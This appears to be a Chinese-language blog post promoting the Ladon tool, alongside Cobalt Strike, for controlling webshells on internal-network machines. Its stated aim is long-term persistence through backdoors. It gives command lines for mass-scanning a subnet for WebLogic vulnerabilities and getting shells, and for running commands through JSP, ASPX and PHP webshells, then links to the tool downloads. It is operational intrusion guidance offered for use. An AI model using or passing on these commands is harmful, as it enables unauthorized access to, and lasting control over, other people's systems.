logo

K8哥哥

没有绝对安全的系统

Ladon & Cobalt Strike连接内网WebShell

前言

无论是外网渗透还是内网渗透,为了能够长期控制权限,都会留下各类后门。
WebShell无额外进程、无额外端口、不主动向外连接的后门使用频率非常高。
外网的有很多管理工具不用说了,但是内网有WebShell机器无法上网怎么办?
方案1:代理后管理工具访问,缺点代理卡时,无法连接内网WebShell
方案2:使用Ladon,无需代理,只要有SHELL就可以连接内网WebShell

PS: Shell不只限于WebShell,而是任何可执行命令的,含远控、后门

一键GetShell

使用WebLogicExp模块对内网进行Weblogic漏洞扫描并GetShell
image

批量:Ladon 192.168.1.8/24 WeblogicExp

Ladon JspShell

1
2
3
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon JspShell cd http://192.168.1.8/shell.jsp Ladon whoami

K8-UA马,类型为1或ua(例子WebLogic)
image

菜刀马,类型为2或cd(例子Struts2)
image

CS JspShell

Cobalt Strike下Ladon连接内网WebShell,用法和在CMD下一模一样

image

其它webshell

1
2
3
4
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

下载

CS: https://github.com/k8gege/Aggressor
Ladon: https://github.com/k8gege/Ladon

扫码加入K8小密圈